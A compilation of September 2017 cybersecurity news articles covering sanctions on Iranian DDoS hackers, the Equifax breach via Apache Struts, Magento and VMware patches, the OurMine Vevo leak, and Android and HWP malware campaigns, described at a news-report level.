Now the Treasury’s Office of Foreign Assets Control (OFAC) has sanctioned a total of 11 Iranian entities and individuals for alleged support of hacking activities as well as two Iran-based networks that were involved in a massive distributed denial-of-service attacks that targeted the US financial institutions in 2012.

“OFAC designated private Iranian computer security company ITSec Team pursuant to E.O. 13694 for causing a significant disruption to the availability of a computer or network of computers. Between approximately December 2011 and December 2012, ITSec Team planned and executed distributed denial of service (DDoS) attacks against at least nine large U.S. financial institutions, including top U.S. banks and U.S. stock exchanges. During that time, ITSec Team performed work on behalf of the Iranian Government, including the IRGC.” states the press release issued by the US Treasury.

“OFAC also designated three Iranian nationals for acting for or on behalf of ITSec Team. Ahmad Fathi was responsible for supervising and coordinating ITSec Team’s DDoS attacks against the U.S. financial sector. Amin Shokohi, a computer hacker who worked for ITSec Team, helped build the botnet that ITSec Team used in its DDoS attacks against U.S. financial institutions. Hamid Firoozi, a network manager at ITSec Team, procured computer servers for the botnet that ITSec Team used in its DDoS activities targeting the U.S. financial sector.”

Iranian nationals sanctioned

Ahmad Fathi, 37; Hamid Firoozi, 34; Amin Shokohi, 25; Sadegh Ahmadzadegan, aka Nitr0jen26, 23; Omid Ghaffarinia, aka PLuS, 25; Sina Keissar, 25; and Nader Saedi, aka Turk Server, 26; were charged to have launched DDoS attacks against 46 organizations, most of which US financial institutions from late 2011 to mid-2013.

Firoozi was also charged with hacking into a server at a New York dam between August and September 2013.

“Hamid Firoozi, a network manager at ITSec Team, procured computer servers for the botnet that ITSec Team used in its DDoS activities targeting the U.S. financial sector.” continues the press release.

The Treasury Department’s has decided to block all property and interests in property of the Iranians entities and U.S. citizens are generally prohibited from engaging in transactions with them.
“As a result of today’s actions, all property and interests in property of those designated subject to U.S. jurisdiction are blocked, and U.S. persons are generally prohibited from engaging in transactions with them.” states the press release. “In addition, foreign financial institutions that facilitate significant transactions for, or persons that provide material or certain other support to, the entities and individuals designated today risk exposure to sanctions that could sever their access to the U.S. financial system or block their property and interests in property under U.S. jurisdiction.”
Of course, any foreign financial institutions will support the sanctioned individuals or entities will also face possible sanctions.


MAGENTO 2.0.16 and 2.1.9 security update fixes critical flaw in the platform
7.9.2017 securityaffairs Vulnerebility

Magento released updates for Magento Commerce and Open Source 2.1.9 and 2.0.16 that fixed also a critical remote code execution vulnerability.
Magento released updates for Magento Commerce and Open Source 2.1.9 and 2.0.16 that fixed numerous flaws, including a critical remote code execution vulnerability.

The remote code execution flaw impacts content management system (CMS) and layouts, it could be exploited by an administrator with limited privileges to add malicious code when creating a new CMS page.

“A Magento administrator with limited privileges can introduce malicious code when creating a new CMS Page, which could result in arbitrary remote code execution.” states the security advisory.

The vulnerability affects Magento Open Source prior to 1.9.3.6, Magento Commerce prior to 1.14.3.6, Magento 2.0 prior to 2.0.16, and Magento 2.1 prior to 2.1.9 and has been addressed in Magento Open Source 1.9.3.6, Magento Commerce 1.14.3.6, SUPEE-10266, Magento 2.0.16, and Magento 2.1.9.

The company also addresses three High severity vulnerabilities affecting Magento 2.0 prior to 2.0.16 and Magento 2.1 prior to 2.1.9.

The list of the flaws includes a cross-site request forgery (CSRF) issue, an unauthorized data leak, and authenticated Admin user remote code execution vulnerability.

“Magento Commerce and Open Source 2.1.9 and 2.0.16 contain multiple security enhancements that help close cross-site request forgery (CSRF), unauthorized data leak, and authenticated Admin user remote code execution vulnerabilities. These releases also include support for the changes to the USPS shipping rates that the USPS introduced on September 1, 2017.” states the advisory.

The update also addresses a total of 28 Medium risk vulnerabilities, including abuse of functionality, information leak, Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS, stored), unvalidated redirection, remote code execution, insufficient session expiration, Denial of Service (DoS), and Insecure Direct Object Reference (IDOR).

The exploitation of the flaws opens the door to various attacks, including Man-in-the-middle attacks, redirection of the users to an external site, or re-usage of cookies.

Other vulnerabilities can be exploited by local admins to the sitemap generation tool to arbitrarily overwrite sensitive files; inject code or executable scripts; inject code in sales order records to launch XSS attack on anyone that views the page; create URLs for CSRF attacks; add new SVG images that contain injected code; or modify page counter to cause an integer overflow preventing the creation of new pages.

The company also fixed two Low-risk vulnerabilities, a bug in account lockout mechanism, which leaks a site’s contact e-mail, and an IDOR that allows a logged-in user to modify order fields that they do not have permission to view.


OurMine hacked Vevo and leaked 3.12 TB internal files, then delete them
7.9.2017 securityaffairs CyberCrime

The notorious OurMine hacker crew has claimed responsibility for the breach of the popular video streaming service Vevo.
Another clamorous data breach made the headlines again, this time the victim is the popular video streaming service Vevo that was hacked by the popular hacking group OurMine.

Vevo is an American multinational video hosting service founded on December 8, 2009, as a joint venture between the “big three” record companies, Universal Music Group (UMG), Sony Music Entertainment (SME) and Warner Music Group (WMG).

It also owned by the official media organization of the Government of Abu Dhabi, Abu Dhabi Media, and Alphabet Inc, the parent company of Google Alphabet Inc.

The notorious Saudi Arabian OurMine group has hacked Vevo and leaked about 3.12 TB worth of internal files.

vevo hack ourmine
OurMine accessed Vevo’s data including internal sensitive office documents, videos, and promotional materials.

vevo hack ourmine 2.png
OurMine leaked the huge trove of data, roughly 3.12 terabytes stolen from the servers of the company, on its website on late Thursday.

Later the company removed the stolen information from the website on Vevo’s request.

OurMine group leaked data from Vevo after one of its employees was disrespectful to an OurMine member on LinkedIn.

OurMine first attempted to warn Vevo of the data breach privately, unfortunately for the company, one of its employees responded,

“F*** off, you don’t have anything,” it went public with the data breach and leaked Vevo files.

and in response, the hacker group leaked the precious files.

OurMine shared the following motivation about the hack.

“We leaked it because yesterday we’ve talked with an employee from VEVO about the leak, and that’s what he said:”

Ourmine hacked vevo

At the time I was writing, most of the links redirect to a Vevo Box.com login page, a notice states that the OurMine “deleted the files because of a request from VEVO.”
According to Gizmodo, that first reported the data breach, the “majority of the [leaked] files seemed pretty mild—weekly music charts, pre-planned social media content, and various details about the artists under the record companies’ management,” albeit a few documents contained sensitive materials.

Variety, who analyzed the stolen documents, reported that the leaked archive included notes on around 90 artists.

“The 3.12-terabyte trove of stolen documents included Vevo’s internal dossiers on about 9o artists, including Ariana Grande, Britney Spears, Calvin Harris, Florida Georgia Line, Jennifer Lopez, Justin Bieber, Katy Perry, Madonna, One Direction, Sia, Taylor Swift, The Weeknd, and U2.” states Variety.

OurMine did not provide details of the hack or information for how long they have been accessing the Vevo servers or whether they have accessed financial data and credentials.
Responding to Gizmodo inquiry, a Vevo spokesperson told Gizmodo that the company “can confirm that Vevo experienced a data breach as a result of a phishing scam via Linkedin. We have addressed the issue and are investigating the extent of exposure.”
OurMine hacker group recently defaced WikiLeaks website with a DNS redirect, it has also hijacked the official Twitter and Facebook accounts for Sony PlayStation Network (PSN) and claimed to have stolen PSN database.

The notorious Saudi Arabian group also hacked social media accounts of HBO and Game of Thrones.

OurMine hacked the Netflix US Twitter account (@Netflix) in December to promote its website and hacking services, it is known for its attacks against high-profile Twitter accounts. The list of victims is very long and includes Mark Zuckerberg, Twitter co-founder Evan Williams, David Guetta Daniel Ek, former Twitter CEO Dick Costolo, Twitter CEO Jack Dorsey, the CEO and founder of Spotify, Google CEO Sundar Pichai, and many others.


Equifax- or the new gold standard for “how not to do Incident Response”!
7.9.2017 securityaffairs CyberCrime

The cybersecurity expert Stuart Peck, Director of Cyber Security Strategy, ZeroDayLab, shared its view on the Equifax data breach.
For those of you living under a rock this week, Equifax suffered a major breach in their security, which led to over 143 million records being stolen by attackers. The information held by Equifax is highly sensitive, especially for US citizens, where personal and financial information including SSN (Social Security Numbers), and credit card data were stolen by the attackers. There is the possibility that over 44 million records in the UK and Canada may also be affected.

What might be news to you that this breach happened in May this year with the attackers being undetected by Equifax security teams until July 29th. Initial indications point towards the attacker(s) exploiting a vulnerability in Apache Struts, giving them access to a vast amount of information. What has not been fully confirmed by Equifax is whether the core database which includes credit file reports has also been compromised by the attackers.

Equifax

So why is this the new gold standard for “how not to do Incident Response”?

There are very many ways Equifax could have handled this breach better, probably more than I can fit into a 700-word article, however, I will try to address the main points here.

If you know about a security breach come out quickly with an accurate and strong message
What’s interesting, and also disastrous for Equifax is that the business knew about a significant breach in their informational systems, for almost 2 months, before publicly announcing the incident. Now, this alone would be enough to damage any potential empathy from their customers, if they came out with we are a victim too angle.

However, Equifax performed the Incident Response cardinal sin, they protected their own interests before those of their customers they clearly let down, with key shareholders dumping their stock before publicly announcing the breach!

The fact Equifax had put their interests first (or created that perception), this meant that a potential “we’re a victim too” card from a crisis communications perspective was no longer a viable option, consequentially the business created a mob and made themselves a bigger target from hacktivism groups.

Have a clear plan for how you are going to communicate with your customers and update them.
When Equifax came out with a message about the breach in security, they created a website in August ironically called Equifaxsecurity2017.com to drive customers to, mainly to check whether their details were included in the incident and some advice on what they should do.

Equifax

In principle this is a good idea, the reality is that it looked like a phishing website especially the Trustedidpremier.com site where customers could check whether they had been affected by the breach. Both causing confusion from customers who at which point were already in a heightened sense of paranoia.

Equifax

What Equifax should have done, is notify all their customer by post and have clear and concise message on what the affected customers should do, and most importantly how Equifax is going to protect and compensate their customers on their main website! They had almost 2 months to prepare, so there are no excuses really.

Ensure you plug those holes! And check your IR plan is actually working.
When in a heightened state of security it’s easy to focus on the incident in hand, in fact, most breaches I’ve personally investigated have quickly led to a follow-up breach because everyone is busy trying to work out how they got breached in the first place… all hands to the pump lead to a blinkered approach were obvious holes are missed.

Equifax

Unfortunately for Equifax, a site in Argentina was taken offline due to another potential breach in security or security configuration issue with the site having and admin username and admin password. With the press hot on the heels on anything related to Equifax, the business cannot afford another mistake, especially relating to PII or credit card information.

Equifax

How not to undertake IR like Equifax

Equifax could have turned this incident into an opportunity to control the narrative of this breach, but short-sighted strategy and what on the outside seems to be a very immature incident response and crisis communication process has led to the media controlling the message.

When facing into the abyss of a major incident what should you be doing?

In essence training like an athlete and stress testing your incident response plan, and if you don’t have one well that the logical first step.
Having a set of relevant runbooks/playbooks that outline key steps to undertake in any given incident scenario, will reduce the inevitable impact of a major security incident
Train your support, IT/Networks, Security, and applications teams on the principles of containing incidents and supporting technical investigations.
Ensure Executives and key business people are trained on internal and most importantly external communications relating to Security Incidents. The first person speaking should be the CIO/CISO then your CEO
Run real-world desktop and technical scenarios to ensure identifying weaknesses or issues with your plan.
Do the right thing for your customers as well as your business, not coming out quickly- especially with GDPR looming can lead to exponential fines and loss or damage to reputation.
If you work in these areas you should be in a stronger position if you are faced with the perfect storm of incidents.

Finally, remember the incident isn’t over until it really is over!

Equifax


Hackers are offering Equifax data for sale, but they are scammers
7.9.2017 securityaffairs CyberCrime

It has happened, the information stolen in the recent Equifax data breach is offered for sale on the dark web by crooks, but watch out, they are scammers.
Equifax discovered the intrusion on July 29, but only 3 months the agency notified customers the incident (on September 7) that occurred between mid-May and late July. The breach affects roughly 143 million U.S. consumers and involves names, social security numbers, dates of birth, addresses and, in some cases, driver’s license numbers, credit card numbers and dispute documents.

Now security experts warn hackers are offering for sale the precious data and warned users to be vigilant on phishing attempts and scams.

The U.S. Federal Trade Commission (FTC) who is investigating the incident issued an alert regarding scam phone calls.

“Ring, ring. “This is Equifax calling to verify your account information.” Stop. Don’t tell them anything. They’re not from Equifax. It’s a scam. Equifax will not call you out of the blue.” states the alert issued by Equifax.

“That’s just one scam you might see after Equifax’s recent data breach. Other calls might try to trick you into giving your personal information.”

Shortly after the Equifax data breach was disclosed, various hackers started offering the data but without demonstrating to possess them.

Many websites appeared on the Tor network, in one case hackers set up a site to blackmail Equifax, they requested the payment of 600 bitcoin (roughly $2.7 million) to avoid the release of all the data, except the credit card numbers.

It was a hoax and once discovered the hackers closed the website.

“Shortly after this breach was made public, a darknet website had popped up claiming to be selling access to the Equifax data. The hackers claim that they did not anticipate receiving such a trove of data, and need to monetize the attack quickly. They state that they will release the entire data set on September 15th, 2017 (one week from the time of the writing). They are asking for 600 BTC, or ~$2.6 million USD.” reported the Weapons Grade Shinanigans.


Catalin Cimpanu @campuscodi
Dark Web portal claiming to sell Equifax data badtouchyonqysm3[.]onion #Equifax #databreach

2:26 PM - Sep 8, 2017
13 13 Replies 395 395 Retweets 265 265 likes
Twitter Ads info and privacy
Recently a group calling itself Equihax started a crowdfunding to collect 600 bitcoin or 8,400 Ethereum to release the precious data, the hackers also offered 1 million data entries for 4 bitcoin ($12,500).

equifax hackers

The hackers leaked the records of Donald Trump, Kim Kardashian, and Bill Gates to proof the authenticity of the data and shared many screenshots demonstrating the access to the Equifax system

Also in this case it was a scam and leaked data were already available online, while the screenshots were clearly forged.

It is easy to predict that other scam websites will emerge in the darknet offering the Equifax data.


Equifax Security Chief, CIO to 'Retire' Immediately
16.9.2017 securityweek CyberCrime
Following the massive data breach that was disclosed on September 7, Equifax announced on Friday that Chief Security Officer Susan Mauldin and Chief Information Officer David Webb are retiring from the company effective immediately.

Russ Ayres, who previously served as a Vice President in the Equifax IT department, has been appointed interim Chief Security Officer.

Mark Rohrwasser has been appointed interim Chief Information Officer. Rohrwasser joined Equifax in 2016 and has led Equifax's International IT operations since that time, the company said.

Ayres will report directly to Rohrwasser.

Equifax informed customers last week that hackers had access to its systems between mid-May and late July. The breach, which affects roughly 143 million U.S. consumers, involved names, social security numbers, dates of birth, addresses and, in some cases, driver’s license numbers.

The company has hired FireEye-owned breach investigations firm Mandiant to work on the investigations, and noted that "Equifax's internal investigation of this incident is still ongoing and the company continues to work closely with the FBI in its investigation."

Equifax initially only revealed that the cybercriminals exploited a vulnerability in a “U.S. website application” to access files. However, financial services firm Baird later claimed to have learned that the application in question was Apache Struts, a framework used by many top organizations to create web apps.

While some believed that the Apache Struts vulnerability was the recently patched CVE-2017-9805, which has been increasingly exploited in the wild to deliver malware, a more likely candidate was CVE-2017-5638, a vulnerability disclosed and fixed in March, and leveraged by cybercriminals shortly after.

An update posted by Equifax on Wednesday to the website dedicated by the company to the cybersecurity incident confirms that CVE-2017-5638 was the Apache Struts 2 flaw exploited by attackers.

This shows that the breach was possible due to the company’s failure to patch a critical vulnerability in more than two months after its disclosure. Following the incident, others started highlighting holes in Equifax’s cyber security, including unpatched cross-site scripting (XSS) vulnerabilities reported to the company more than one year ago, and the lack of many basic protections.

Security blogger Brian Krebs reported on Tuesday that an Equifax Argentina employee portal exposed 14,000 records, including employee credentials and consumer complaints.

After New York Attorney General Eric T. Schneiderman announced the launch of a formal investigation into the Equifax breach, Illinois and nearly 40 other states joined the probe.

Equifax shares have fallen more than 30% since the disclosure of the breach, wiping more than $5 billion off the company’s market capitalization.

Equifax says that it maintains data on more than 820 million consumers and more than 91 million businesses worldwide.


HWP Documents and PostScript Abused to Spread Malware
16.9.2017 securityweek Virus
A recently malware attack has been leveraging the Hangul Word Processor (HWP) word processing application and its ability to run PostScript code, Trend Micro reveals.

Highly popular in South Korea, HWP has been long used in targeted attacks to perform reconnaissance or to spread remote access Trojans. In some attacks, the HWP documents were used alongside JPG, PDF, XLS, and other file formats.

As part of the recent incidents, the attackers abused HWP in association with PostScript, a language originally used for printing and desktop publishing. The campaign relies on emails containing malicious attachments to distribute malware, the researchers say.

Although a branch of PostScript called Encapsulated PostScript adds restrictions so as to make the opening of documents safer, older HWP versions implement these restrictions improperly. As a result, attackers have started using attachments containing malicious PostScript to drop shortcuts (or actual malicious files) onto the affected system.

The attack relies solely on PostScript to gain a foothold onto a victim’s machine and doesn’t use an actual exploit, the researchers say. Instead, it abuses a feature of PostScript that can manipulate files.

Although the language doesn’t have the ability to execute shell commands, it is used to drop files into various startup folders. Thus, these files are executed when the user reboots their machine.

The attack is used not only to drop executable files in the startup folder, but also to drop a shortcut to execute MSHTA.exe and run a JavaScript file. As part of other attacks, a shortcut is dropped in a startup folder, along with a DLL file in the %Temp% directory. The shortcut would call rundll32.exe to execute said DLL file.

One of the observed samples, Trend Micro says, would overwrite the file gswin32c.exe – which is the PostScript interpreter used by HWP – with a legitimate version of Calc.exe. Thus, other embedded PostScript content cannot be executed.

Because newer versions of the Hangul Word Processor implement EPS correctly, users are advised to upgrade the application to stay protected. The 2014 versions and later aren’t susceptible to this type of attack, Trend Micro says.


VMware Patches Critical SVGA Code Execution Flaw
16.9.2017 securityweek Vulnerebility
Patches released this week by VMware address several vulnerabilities, including one rated critical, in the company’s ESXi, vCenter Server, Workstation and Fusion products.

The flaw considered critical, tracked as CVE-2017-4924, is an out-of-bounds write issue in the SVGA device, an old virtual graphics card implemented by VMware virtualization products. The vulnerability can allow a guest to execute code on the host, VMware said.

Nico Golde and Ralf-Philipp Weinmann of Comsecuris UG reported the security hole to VMware via the Zero Day Initiative (ZDI) on June 22. In its own advisory, ZDI pointed out that an attacker must somehow gain the ability to execute low-privileged code on the guest in order to exploit the flaw.

“The specific flaw exists within the Shader implementation,” ZDI said. “The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the host OS.”

While VMware has classified the vulnerability as critical, ZDI has only assigned it a CVSS score of 6.2, which puts it in the medium severity category. ESXi 6.5, Workstation 12.x and Fusion 8.x on OS X are affected.

The second vulnerability patched this week, classified as medium severity and tracked as CVE-2017-4925, was discovered by Zhang Haitao. He noticed that ESXi, Workstation and Fusion have a NULL pointer dereference vulnerability caused due to the handling of guest RPC requests. An attacker with normal user privileges can exploit this flaw to crash the VM.

This weakness affects ESXi 5.5, 6.0 and 6.5, Workstation 12.x and Fusion 8.x on OS X.

The third vulnerability, also rated medium severity, was found by Thomas Ornetzeder and it’s tracked as CVE-2017-4926. Ornetzeder discovered that the vCenter Server H5 Client on version 6.5 contains a stored cross-site scripting (XSS) flaw. An attacker that has VC user privileges can inject malicious JavaScript code that will be executed when other users access that page.


Chrome to Label FTP Resources as "Not Secure"
15.9.2017 securityweek Safety
Google announced on Thursday that future versions of Chrome will label resources delivered via the File Transfer Protocol (FTP) as “Not secure.”

The change will be implemented starting with Chrome 63, currently scheduled for release in December 2017. The move is part of Google’s long-term plan to flag all non-secure connections in an effort to alert users and encourage website owners and administrators to migrate to HTTPS.

“We didn't include FTP in our original plan, but unfortunately its security properties are actually marginally worse than HTTP (delivered in plaintext without the potential of an HSTS-like upgrade),” Google software engineer Mike West explained.

West pointed out that FTP usage for top-level navigations was 0.0026% in the last month. In the case of downloads, there were roughly 5% that were conducted over something other than HTTP/HTTPS, which could be FTP.

Google has encouraged website developers to migrate the downloads they offer, particularly for executable files, from FTP to HTTPS, and pointed as an example to the Linux Kernel Archives, which plans on terminating all FTP services by the end of the year.

Chrome developers have been discussing the possibility of removing built-in support for FTP since January 2014, but for the time being the use of the protocol will only be marked as “not secure.”

Chrome marks FTP sites as not secure

“When a feature gets usage that low, we generally start talking about removing it. Especially if it exposes attack surface or is fundamentally unsafe on the network, as FTP does and is,” said Google’s Chris Palmer.

FTP has been around in its current form since the 1980s. Support for the SSL and TLS protocols can be added via the FTP Secure (FTPS) extension, but FTPS is not supported by web browsers.

“As for FTPS, I'm glad it exists, but if we were going to focus on getting server operators to migrate to a new protocol, we would focus (and are focusing) on HTTPS,” Palmer added.


75,000 Turks Arrested So Far for Downloading Encrypted Messaging App
15.9.2017 thehackernews  BigBrothers

WARNING: If you are Turkish and using or have installed ByLock—a little-known encrypted messaging app—you could be detained by Turkish authorities.
You might be thinking why???
Because using this app in Turkish is illegal since last year.
The background story begins here...
Remember the deadliest Turkey's failed coup attempt?
In July 2016, a section of the Turkish military launched a coordinated operation—by deploying soldiers, tanks on the streets of major Turkish cities—to topple the government and unseat President Recep Tayyip Erdogan.
The Turkish government blamed Muhammed Fethullah Gülen, a Turkish preacher who lives in the United States, for leading the July 15-16 attempted coup, though Gülen denied any involvement.
In the aftermath of the coup attempt, Milli İstihbarat Teşkilatı (MİT), the Turkish intelligence agency investigated and found that the ByLock messaging app was used as a communication tool by tens of thousands of Gülen movement followers to coordinate the coup.

Since then the Turkish government has detained 75,000 people in an unprecedented crackdown for downloading the ByLock app, which has been declared illegal, according to the Guardian.
Arrested people includes civil servants, judges, police officers, soldiers, house makers, and businessmen, who allegedly participated in the failed military coup attempt.
For those unaware, ByLock was one of the many encrypted messaging apps available to download for free on Apple's App Store and Google's Play Store and was downloaded over 600,000 times between April 2014 and April 2016, according to a report by British computer forensics expert, Thomas K. Moore.
It turns out that the Turkish authorities were able to crack ByLock because of its weak encryption algorithm and managed to decrypt 10 million encrypted messages, which lead to evidence against thousands of rebels and undercover Gülenist operatives.
The Turkish government also believes that ByLock has been created by the Fetullahist Terrorist Organization (FETÖ), for delivering Gülen's messages among his followers as well as to instruct them on how to carry out plots against anti-Gülenists.
According to a legal opinion published in London, arresting people on the basis of just downloading an encrypted messaging app violates their human rights under Article 5 of the European Convention on Human Rights (ECHR), which guarantees the right to liberty.


Yet Another Android Malware Infects Over 4.2 Million Google Play Store Users
15.9.2017 thehackernews  Android

Even after so many efforts by Google, malicious apps somehow managed to fool its Play Store's anti-malware protections and infect people with malicious software.
The same happened once again when at least 50 apps managed to make its way onto Google Play Store and were successfully downloaded as many as 4.2 million times—one of the biggest malware outbreaks.
Security firm Check Point on Thursday published a blog post revealing at least 50 Android apps that were free to download on official Play Store and were downloaded between 1 million and 4.2 million times before Google removed them.
These Android apps come with hidden malware payload that secretly registers victims for paid online services, sends fraudulent premium text messages from victims' smartphones and leaves them to pay the bill—all without the knowledge or permission of users.
Dubbed ExpensiveWall by Check Point researchers because it was found in the Lovely Wallpaper app, the malware comes hidden in free wallpaper, video or photo editing apps. It's a new variant of malware that Mcafee spotted earlier this year on the Play Store.
But what makes ExpensiveWall malware different from its other variants is that it makes use of an advanced obfuscation technique called "packed," which compresses malicious code and encrypts it to evade Google Play Store's built-in anti-malware protections.
The researchers notified Google of the malicious apps on August 7, and the software giant quickly removed all of them, but within few days, the malware re-emerged on the Play Store and infected over 5,000 devices before it was removed four days later, Check Point said.
Here's How ExpensiveWall Malware Works:

Once an app with ExpensiveWall—which researchers think came from a software development kit called GTK—is downloaded on a victim's device, the malicious app asks for user's permission to access the Internet, and send and receive SMS messages.
The internet access is used by the malware to connect the victim's device to the attacker's command and control server, where it sends information on the infected handset, including its location alongside unique hardware identifiers, such as MAC and IP addresses, IMSI and IMEI numbers.
The C&C server then sends the malware a URL, which it opens in an embedded WebView window to download JavaScript code that begins to clock up bills for the victim by sending fraudulent premium SMS messages without their knowledge, and uses the victim's phone number to register for paid services.
However, according to the Check Point researchers, it is still unclear how much revenue was generated via ExpensiveWall's premium SMS scam.
Google's Play Store—Home for Malware
Android malware continues to evolve with more sophisticated and never-seen-before capabilities with every passing day, and spotting them on Google Play Store has become quite a common thing.
Last month, over 500 Android apps with spyware capabilities were found on Play Store, which had been downloaded more than 100 million times.
In July, Lipizzan spyware apps were spotted on Play Store that can steal a whole lot of information on users, including text messages, emails, voice calls, photos, location data, and other files, and spy on them.
In June, more than 800 Xavier-laden apps were discovered on Google Play that had been downloaded millions of times, and the same month researchers found first code injecting rooting malware making rounds on Google Play Store.
A month prior to it, researchers spotted 41 apps on Play Store hidden with the Judy Malware that infected 36.5 million Android devices with malicious ad-click software.
In April, over 40 apps with hidden FalseGuide malware were spotted on Play Store that made 2 Million Android users victims.
Earlier this year, researchers also discovered a new variant of the HummingBad malware, dubbed HummingWhale, hidden in more than 20 apps on Google Play Store, which were downloaded by over 12 Million users.
How to Protect Your Android From Such Malware Apps
Even after Google removed all the malware-tainted apps from its official Play Store marketplace, your smartphones will remain infected with the ExpensiveWall malware until you explicitly uninstall the malicious apps, if you have downloaded any.
Google has recently provided a security feature known as Play Protect that uses machine learning and app usage analysis to automatically remove malicious apps from the affected smartphones to prevent further harm.
However, according to the Check Point researchers, many phones run an older version of Android that does not support the feature, leaving a wide audience open to malware attacks.
You are strongly advised to always keep a good antivirus app on your device that can detect and block any malicious app before it can infect your device, and always keep your device and all apps up-to-date.


CVE-2017-5638 Apache Struts vulnerability is the root cause behind Equifax data breach
15.9.2017 securityaffairs Vulnerebility

It’s official, the Equifax data breach case was caused by the exploitation of the CVE-2017-5638 Apache Struts vulnerability.
The Equifax data breach case was solved, that incident was caused by the exploitation of the CVE-2017-5638 Apache Struts vulnerability. The vulnerability affects the Jakarta Multipart parser upload function in Apache and could be exploited by an attacker to make a maliciously crafted request to an Apache web server. Just after the experts from the Cisco Talos publicly disclosed it, proof-of-concept exploit code for Metasploit was made available allowing anyone to launch public scans. The attacks leveraging the flaw spiked and in one case crooks leveraged on the flaw to deliver Cerber ransomware of the vulnerable servers.

The vulnerability was fixed back in March, but the company did not update its systems, the thesis was also reported by an Apache spokeswoman to the Reuters agency.

The website of Equifax was updated only Wednesday while the company and law enforcement were investigating the incident.

“Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.” reads the statement published by the company on its website.

Equifax data breach

Shortly after the Equifax data breach, security experts pointed out different possible causes for the incident, including the possible exploitation of the recently fixed CVE-2017-9805 Apache Struts vulnerability or a still unknown zero-day flaw.

Last week, security researchers with the firm Baird published a report that supported the thesis of the exploitation of a Struts vulnerability for the hack but did not specify which one was used by hackers.

Jeff Williams, CTO of Contrast Security, on Saturday, suggested the CVE-2017-5638 was likely the root cause of the Equifax dart breach.

“The first vulnerability from March seems much more likely because it’s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,” Williams wrote, “The process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,” Williams.

Last week, the U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to investigate the security breach and verify cybersecurity safeguards adopted by the company.

“The volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,” Warner wrote, “In ways similar to the financial service industry’s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.”


Scammers Offer to Sell Data Stolen in Equifax Hack

15.9.2017 securityweek CyberCrime
While the large amount of information stolen in the recent Equifax hack might be up for sale somewhere on the dark web, scammers have also set up websites offering the data from the U.S. credit reporting agency.

Equifax alerted customers on September 7 that hackers had accessed its systems between mid-May and late July. The breach affects roughly 143 million U.S. consumers and involves names, social security numbers, dates of birth, addresses and, in some cases, driver’s license numbers, credit card numbers and dispute documents. Equifax has confirmed that an Apache Struts vulnerability was used in the attack.

Security experts believe the attackers will likely try to sell the data and warned users to be on the lookout for phishing attempts and scams.

The U.S. Federal Trade Commission (FTC) has launched an investigation into the massive data breach, and released an alert regarding scam phone calls from people claiming to represent Equifax.

Shortly after Equifax disclosed the breach, various individuals started claiming to possess the stolen data. One hacker with the online moniker “1x0123,” who had previously been credited for finding vulnerabilities in software and websites, offered to sell access to Equifax servers on Twitter, but later locked his account after more reputable researchers pointed out that he was a scammer.

One of the first scam websites emerged on the Tor anonymity network hours after Equifax made the announcement. The individuals who had set up the site wanted Equifax to pay them 600 bitcoin (at the time worth roughly $2.7 million) to prevent the public release of all the data – except the credit card numbers – on September 15.

After several experts pointed out that it was likely a scam or a hoax, the operator of the service hosting the Tor website shut them down.

A more recent attempt to allegedly sell the Equifax data comes from a group calling itself “Equihax.” They offered to release all the data via a crowdfunding effort whose goal was 600 bitcoin or 8,400 Ethereum. They also offered to sell 1 million data entries for 4 bitcoin ($12,500).

In order to prove that they are in possession of the Equifax data, they leaked the records of three individuals – Donald Trump, Kim Kardashian and Bill Gates – and posted various screenshots apparently showing that they had access to the credit reporting agency’s systems.

Equifax leak

While they convinced some people that their claims are legitimate, others pointed out that this, too, is likely a scam. The first hint is that the details of Trump, Kardashian and Gates were posted online some time ago, and when Ars Technica’s Sean Gallagher and others pointed out that Gates’ residence is not in Wisconsin as the leaked records showed, the “hackers” changed it to Washington.

The format of the data does suggest that it has been extracted from a database, but the data could could have been easily forged considering that only a small sample has been provided.

As for the screenshots, they allegedly show several administration panels used by Equifax, but these, too, could have been easily forged or taken from another location. For example, one of the screenshots does reference Equifax, but most of the domains and paths appear to be related to the Royal Bank of Canada.

Fake Equifax hack


U.S. Politicians Demand Probe of Equifax After Hack

15.9.2017 securityweek CyberCrime
A senior US senator called Wednesday for a federal investigation of credit rating agency Equifax after the company lost the personal data of 143 million customers to hackers.

Senator Mark Warner asked the Federal Trade Commission, one of the few bodies with oversight powers over loosely-regulated credit raters, to examine Equifax's security practices and its "widely-panned response" to consumers potentially impacted by the breach.

Warner, a member of the powerful Senate Banking Committee, accused the company of "exceptionally poor cybersecurity practices" that continued even after the hack became known.

He also said the company's woeful response to people whose data may have been lost -- including trying to charge them for protection -- was "alarming".

"The volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize."

Equifax is one of the three major firms which collect consumers' financial data in order to rate their credit-worthiness to banks, home sellers, auto sellers and others who depend on consumer credit in marketing.

The data the company admitted to losing on September 7 includes people's names, social security numbers, addresses, credit card numbers, and other financial details.

Such data is often used by criminals to steal people's identities for financial gain.

Although crucial to the smooth functioning of the US banking industry, credit rating agencies are little regulated, and Warner called for the FTC to take a stronger oversight role.

US officials are investigating the data hack but would not say Wednesday if they knew who was behind it, though foreign hackers are widely suspected.

The breach took place from mid-May through July 2017 via a website application vulnerability that US cyber security companies say they had identified in March.

Congress has expressed outrage at the hack and the company's management of it. Particular anger has been aimed at allegations that three Equifax officials sold their stock in the company before the hack was made public.

On Monday Senate Finance Committee Chairman Orrin Hatch and Ranking Member Ron Wyden called on Equifax to explain the breach and its actions to the committee.

"The scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers," they told Equifax in a letter.


Magento Patches Critical Vulnerability in eCommerce Platforms

